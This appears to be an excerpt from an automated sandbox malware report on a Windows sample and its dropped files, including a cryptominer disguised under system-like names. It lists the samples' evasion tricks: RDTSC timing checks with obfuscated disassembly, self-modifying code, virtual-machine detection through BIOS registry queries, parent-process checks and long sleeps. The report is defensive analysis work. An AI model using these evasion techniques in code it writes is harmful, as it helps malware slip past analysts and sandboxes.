Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C407BE second address: 4C407C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C407C4 second address: 4C407C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C407C8 second address: 4C407CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C407CC second address: 4C40830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF624B4E7E6h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ch, CDh 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007FF624B4E7E5h 0x0000001a and esp, FFFFFFF8h 0x0000001d jmp 00007FF624B4E7DEh 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 movzx esi, dx 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ebx, ecx 0x00000030 mov dl, al 0x00000032 popad 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov bl, cl 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40830 second address: 4C40854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40854 second address: 4C40858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40858 second address: 4C4085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4085E second address: 4C4089A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ah 0x00000005 pushfd 0x00000006 jmp 00007FF624B4E7DDh 0x0000000b adc cx, F436h 0x00000010 jmp 00007FF624B4E7E1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF624B4E7DCh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4089A second address: 4C408C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C75305h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C408C1 second address: 4C40995 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d call 00007FF624B4E7DCh 0x00000012 mov ecx, 6C189271h 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d mov ebx, 00000000h 0x00000022 jmp 00007FF624B4E7E4h 0x00000027 test esi, esi 0x00000029 pushad 0x0000002a movzx ecx, dx 0x0000002d call 00007FF624B4E7E3h 0x00000032 pushfd 0x00000033 jmp 00007FF624B4E7E8h 0x00000038 or cx, FC08h 0x0000003d jmp 00007FF624B4E7DBh 0x00000042 popfd 0x00000043 pop esi 0x00000044 popad 0x00000045 je 00007FF696E34215h 0x0000004b pushad 0x0000004c mov di, 7738h 0x00000050 mov cx, bx 0x00000053 popad 0x00000054 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e pushfd 0x0000005f jmp 00007FF624B4E7DBh 0x00000064 add ecx, 0AFAECFEh 0x0000006a jmp 00007FF624B4E7E9h 0x0000006f popfd 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40995 second address: 4C40A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF624C752FCh 0x00000012 adc eax, 21847328h 0x00000018 jmp 00007FF624C752FBh 0x0000001d popfd 0x0000001e push ecx 0x0000001f mov ax, di 0x00000022 pop ebx 0x00000023 popad 0x00000024 je 00007FF696F5ACC7h 0x0000002a jmp 00007FF624C752FEh 0x0000002f test byte ptr [76FB6968h], 00000002h 0x00000036 pushad 0x00000037 mov ax, 485Dh 0x0000003b mov bx, ax 0x0000003e popad 0x0000003f jne 00007FF696F5ACB6h 0x00000045 jmp 00007FF624C75304h 0x0000004a mov edx, dword ptr [ebp+0Ch] 0x0000004d jmp 00007FF624C75300h 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 mov bh, ah 0x00000056 pushad 0x00000057 pushfd 0x00000058 jmp 00007FF624C75309h 0x0000005d or esi, 1EA724B6h 0x00000063 jmp 00007FF624C75301h 0x00000068 popfd 0x00000069 mov cx, 0AA7h 0x0000006d popad 0x0000006e popad 0x0000006f push eax 0x00000070 pushad 0x00000071 movsx ebx, si 0x00000074 mov edx, ecx 0x00000076 popad 0x00000077 xchg eax, ebx 0x00000078 jmp 00007FF624C752FEh 0x0000007d xchg eax, ebx 0x0000007e push eax 0x0000007f push edx 0x00000080 jmp 00007FF624C75307h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40A91 second address: 4C40ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FF624B4E7DFh 0x00000008 pop eax 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF624B4E7E1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40ABD second address: 4C40B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FF624C752FEh 0x0000000f push dword ptr [ebp+14h] 0x00000012 jmp 00007FF624C75300h 0x00000017 push dword ptr [ebp+10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF624C752FAh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B05 second address: 4C40B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B26 second address: 4C40B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushfd 0x00000008 jmp 00007FF624C75306h 0x0000000d add esi, 62094E18h 0x00000013 jmp 00007FF624C752FBh 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B56 second address: 4C40B9E instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF624B4E7E8h 0x00000008 and ecx, 1545B878h 0x0000000e jmp 00007FF624B4E7DBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF624B4E7E5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B9E second address: 4C40C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 98A2h 0x00000007 pushfd 0x00000008 jmp 00007FF624C75303h 0x0000000d sbb ah, FFFFFF9Eh 0x00000010 jmp 00007FF624C75309h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop ebx 0x0000001a jmp 00007FF624C752FEh 0x0000001f mov esp, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FF624C752FDh 0x0000002a sbb ax, 3E86h 0x0000002f jmp 00007FF624C75301h 0x00000034 popfd 0x00000035 mov ecx, 210AEC37h 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DB3 second address: 4C50DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DB8 second address: 4C50DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DBE second address: 4C50DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DC2 second address: 4C50E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 9923h 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 pushfd 0x00000016 jmp 00007FF624C75302h 0x0000001b adc al, 00000068h 0x0000001e jmp 00007FF624C752FBh 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50E16 second address: 4C50E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50E1C second address: 4C50E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75308h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50E38 second address: 4C50E61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF624B4E7E5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50E61 second address: 4C50E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C752FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50BE0 second address: 4C50BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50BE6 second address: 4C50C0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov bx, 5CC2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624C75304h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC05E0 second address: 4CC05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC05E6 second address: 4CC068C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FF624C75304h 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF624C752FEh 0x0000001e jmp 00007FF624C75305h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007FF624C75300h 0x0000002a jmp 00007FF624C75305h 0x0000002f popfd 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 jmp 00007FF624C752FEh 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF624C75307h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC068C second address: 4CC0692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0692 second address: 4CC0696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0696 second address: 4CC069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC03C4 second address: 4CC044C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF624C752FFh 0x00000009 or esi, 5D9865EEh 0x0000000f jmp 00007FF624C75309h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FF624C75300h 0x0000001b or si, C568h 0x00000020 jmp 00007FF624C752FBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a jmp 00007FF624C75306h 0x0000002f mov ebp, esp 0x00000031 jmp 00007FF624C75300h 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC044C second address: 4CC0469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601EC second address: 4C601F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601F2 second address: 4C601F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601F8 second address: 4C601FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C601FC second address: 4C60236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624B4E7E7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60236 second address: 4C6025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF624C75306h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C6025C second address: 4C6027F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF624B4E7DBh 0x00000012 pop eax 0x00000013 movsx edx, ax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC08DC second address: 4CC091C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+0Ch] 0x0000000d pushad 0x0000000e mov edi, 42074EF8h 0x00000013 call 00007FF624C75301h 0x00000018 call 00007FF624C75300h 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f popad 0x00000020 push dword ptr [ebp+08h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC091C second address: 4CC0931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7E1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0931 second address: 4CC096B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF624C752F9h 0x0000000d jmp 00007FF624C752FDh 0x00000012 push eax 0x00000013 jmp 00007FF624C75301h 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC096B second address: 4CC096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC096F second address: 4CC0975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0975 second address: 4CC09DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF624B4E7DAh 0x00000014 or ecx, 6A234FA8h 0x0000001a jmp 00007FF624B4E7DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FF624B4E7E8h 0x00000026 adc ecx, 2A5FC208h 0x0000002c jmp 00007FF624B4E7DBh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70598 second address: 4C70612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushfd 0x00000006 jmp 00007FF624C752FBh 0x0000000b or ax, 51EEh 0x00000010 jmp 00007FF624C75309h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov al, dh 0x0000001d movzx esi, di 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FF624C752FBh 0x00000027 mov ebp, esp 0x00000029 jmp 00007FF624C75306h 0x0000002e push FFFFFFFEh 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FF624C75307h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70612 second address: 4C7069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FF624B4E7D9h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF624B4E7DCh 0x00000015 or si, 5888h 0x0000001a jmp 00007FF624B4E7DBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FF624B4E7E8h 0x00000026 sbb si, BAE8h 0x0000002b jmp 00007FF624B4E7DBh 0x00000030 popfd 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jmp 00007FF624B4E7E2h 0x0000003b mov edx, esi 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7069B second address: 4C70756 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 mov bh, 12h 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 mov edx, 38A5083Eh 0x0000001c pushfd 0x0000001d jmp 00007FF624C752FFh 0x00000022 or ah, FFFFFFEEh 0x00000025 jmp 00007FF624C75309h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 jmp 00007FF624C75301h 0x00000035 pop eax 0x00000036 pushad 0x00000037 call 00007FF624C752FCh 0x0000003c call 00007FF624C75302h 0x00000041 pop ecx 0x00000042 pop edx 0x00000043 mov di, si 0x00000046 popad 0x00000047 call 00007FF624C752F9h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF624C75309h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70756 second address: 4C70766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70766 second address: 4C707AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FF624C75309h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF624C75303h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C707AC second address: 4C707B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9CED45 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B7000E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B70386 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B97678 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: B75F1A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BF1ABC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: C8ED45 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E3000E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E30386 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E57678 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E35F1A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: EB1ABC instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Memory allocated: 850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Memory allocated: 1B410000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 1AFA0000 memory reserve \| memory write watch
Source: C:\Windows\System32\services64.exe	Memory allocated: 17C0000 memory reserve \| memory write watch
Source: C:\Windows\System32\services64.exe	Memory allocated: 1B8B0000 memory reserve \| memory write watch
Source: C:\Windows\System32\services64.exe	Memory allocated: C60000 memory reserve \| memory write watch
Source: C:\Windows\System32\services64.exe	Memory allocated: 1B3C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 2ED0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 1B5C0000 memory reserve \| memory write watch
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Memory allocated: CA0000 memory reserve \| memory write watch
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Memory allocated: 1B220000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: D40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Memory allocated: 1B3E0000 memory reserve \| memory write watch
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Memory allocated: CB0000 memory reserve \| memory write watch
Source: C:\Windows\System32\Microsoft\Libs\sihost64.exe	Memory allocated: 1B2A0000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04CC0942 rdtsc

0_2_04CC0942

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe

Code function: 7_2_00401B3F GetCurrentProcessId,CreateToolhelp32Snapshot,fwrite,Process32First,_stricmp,Process32Next,CloseHandle,CloseHandle,

7_2_00401B3F

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\miner2.0.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\svchost64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\services64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\services64.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
